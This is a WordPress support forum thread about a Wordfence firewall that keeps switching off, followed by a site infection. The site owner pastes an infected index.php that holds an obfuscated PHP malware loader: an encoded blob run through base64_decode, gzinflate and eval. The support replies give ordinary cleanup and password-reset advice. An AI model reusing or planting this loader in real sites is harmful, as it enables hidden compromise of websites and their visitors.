Support » Plugin: Wordfence Security - Firewall & Malware Scan » Wordfence Firewall getting disabled everyday

  • Resolved sonicplumber

    (@sonicplumber)


    I have configured Wordfence firewall on my website with Wordfence extended protection enabled.
    However, everyday when i log in to the wordpress admin it asks me to configure this firewall again, it seems to not save the setting when the date changes somehow. It remains active for the whole day once enabled, but gets disabled again the next day,
    Ran the Scan and the following message appears at the end in the logs even though no threats are found.
    [Feb 01 16:15:12] Notice: Undefined index: version in /home/u367504499/domains/sonicplumber.com/public_html/wp-content/plugins/wordfence/lib/wfScanEngine.php on line 1696 Notice: Undefined index: version in /home/u367504499/domains/sonicplumber.com/public_html/wp-content/plugins/wordfence/lib/wfScanEngine.php on line 1716

    Please advise how to fix this.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @sonicplumber, thanks for getting in touch.

    Firstly, the ‘version’ notice is related to Wordfence scanning the wordpress.org repository to check that your installed plugins/themes haven’t been modified from the official versions. I’ve seen this before where the developer has mistakenly not included a version number with their release. You can disable all plugins except for Wordfence and enable them one-by-one to see when this issue reoccurs. You could then drop the appropriate developer a message to let them know that this was an issue. As it’s not a fatal error, your site (and Wordfence) can still function under this condition.

    As for the disabling of Wordfence’s firewall every day, it sounds like it’s regular enough to potentially be a cron job on your server that is actively seeking out Wordfence and/or other plugins and disabling it deliberately.

    Some hosts in the past have been known to disallow Wordfence, and whilst we try to work closely with hosts to explain why millions of customers use it as part of their WordPress security solutions, some do not change their stance on this. I’m wondering if that’s the case here due to the regularity.

    Can you send a diagnostic report to wftest @ wordfence . com? You can find the link to do so at the top of the Wordfence Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

    Note: For the fastest response time, please make sure and add any information or questions directly to this topic and not the email address above unless asked.

    Thanks,

    Peter.

    Thread Starter sonicplumber

    (@sonicplumber)

    I have sent the diagnostic report as requested by you.
    Also, again the firewall got disabled today and my site was infected with malware.
    During the scan run after finding my firewall disabled, it reported the following errors.
    Critical Problems:

    * File appears to be malicious or unsafe: wp-options.php

    * File appears to be malicious or unsafe: smtphec.php

    * File appears to be malicious or unsafe: index.php

    * File appears to be malicious or unsafe: indeeex.php

    * File appears to be malicious or unsafe: wp-activate.php

    * File appears to be malicious or unsafe: wp-includes/SimplePie/wp-logs.php

    High Severity Problems:

    * WordPress core file modified: index.php

    * WordPress core file modified: wp-activate.php

    Once I repair / delete the infected files, the site no longer works.

    If I view the modified index.php file, I see the following code

    1 <?php
    2 $UeXploiT = “Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUHHMM8iLN64IyMnPDEkN0kQ\x431g\x41\x3d”;
    3 $An0n_3xPloiTeR = “\x3d\x3dwwTTgWvw\x63vKfLx/w\x6108qU/D8PO6y1tNyyUEGMZm\x63jUWksvYrQixstXqRMdzNh\x4134\x41n1Zvmd0X0HO1\x62jtSqWSk\x41P\x43tp/\x2b4Y6rSQkDGhVzvo6oDX8S5QSjsz36p1Ul\x41RMvylOULMR\x42uQJ2X5ntLz8GI7/hEIW\x41Lz32wT1\x2bP\x42S\x62R\x6331zM\x42TRRVxUpXISVP3F4XpEXzW39G7e\x41v97s8nP\x62L5P\x42QqKIxrJXh\x43Ggz\x626HLg\x62MdH\x61vR5EShWwkyU7yRn\x42wrDrqeVf\x2bD8Jo6q\x63miQY\x63r\x62\x43\x61v2K1\x62WsH4OtlRk8EwR\x2bjIvu1/f\x415g\x41ptY7jg9keTH0DQZ/D2\x41wYx4LRgIPF5pP8X\x2bjOVWt4t\x43\x436Yrr\x43gJI39v4s\x2b\x63xr4gzh23XRMvGRx4zSP871WwPHP71E25/\x62SOSxh9yusYInSX8JLX/\x41\x62h\x43qLHhyl789D\x637eFs4lGllvRg41Qri7p\x639Y9P\x63W/1Oj5\x631\x63q/qQpzsLuImL72Jz7VOzwJjUq\x43fJooYwlLJ0MKNr0I\x62/Hj0\x624y\x41WuEZNFifnxIPIkNdm\x41e0\x41V87uDYe/l//TY5Ph38t0dV\x41v\x63QZpyJSH\x2bUNlRjTqTj7w\x61htXgxQEh\x432hEN\x41p7j5uYTyrSmvXn9Lqh\x62hS\x42\x42QXI\x42F\x43Q7e\x42Ux9dhlT07V9O5\x41yrz7gfWM7\x42hJkzyMN/G\x2bsDsL/\x622ht\x2bYuGDQxjDJEV\x41lVVdVdTT9FSkfmh\x41LIupz6o\x62qqU\x43EGlyh/3mM5P7DS406iugu8Ix7NZdXNnMNfjrw0yTY\x61X\x62Xk7N4S539kJ34M8o\x42\x63\x41ZwJUDs\x2b4YvoNWrMZTz\x62IZf6\x42d0fnLo\x2bJeg\x42LU//Gj7jNrRGXXXKO37RlURnJWipffpLy\x41tLTjs8ZdpP8\x63ULiJ\x2bie4oIMS\x62LjYdPPgHXOl87Nm\x423\x63VZ\x42nz9r2wtplZwStRrmeV2qenRq/2pN8\x43d\x62OVfI1hRomP5QghTUIg49m7O6dJzpL7\x61m9PGU\x62Nxz\x62q9in\x2bxT\x62hr6SztE0\x2bDm8\x63TeY\x41tNW\x42\x619TNnMHSxLF1qfSh31pVjWvgnlihuVU2IwWhsxL\x63tFJSyUEUVXhr/WEm4\x41olqpyZQN90MIF\x63j3keYz2\x43t\x63MNNP\x41qmTe\x42sM50Jn\x42\x43KL/Vty2\x63\x62RXtWrS6HT\x41/v8Zz9fm39e\x61WQ4M52Ud\x62\x62DOjv/\x62\x63xh\x61EHdxKGn\x42gh3Q0lL2qdWXOttx\x43Ps17LEQigjxxw/P\x42X\x2bjhSi\x2b2\x61V1I/LO\x41d\x42wJe8D4\x41/F\x41/7N\x41h\x42wJe8D3\x41PG\x41/rN\x41l\x42wJe8D2\x41fG\x41/\x62N\x41p\x42wJe”;
    4 eval(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT))));
    5 exit;
    6 ?>

    Please advise

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sonicplumber, thanks for sending your diagnostics over and reporting back on the issue still occurring.

    I cannot see a clear reason why Wordfence is being consistently disabled like this, but that may be down to cron naming or something not easily searchable. I would take the following actions, especially now there seems to be a compromised set of files on your website.

    Follow the checklist here:
    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
    Make sure and get all your plugins and themes updated and update WordPress core too. If you are on an older branch (WordPress 4.x etc) because you wanted to wait before installing the latest version because of Gutenberg or a custom theme compatibility you still need the latest update in that version. Those can be found here:
    https://wordpress.org/download/releases/
    WordPress sometimes patches their older releases if they find a vulnerability so make sure to update your version if needed. We, of course, recommend that you update to the latest version.

    As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure and do this.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Let me know how you get on!

    Peter.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Wordfence Firewall getting disabled everyday’ is closed to new replies.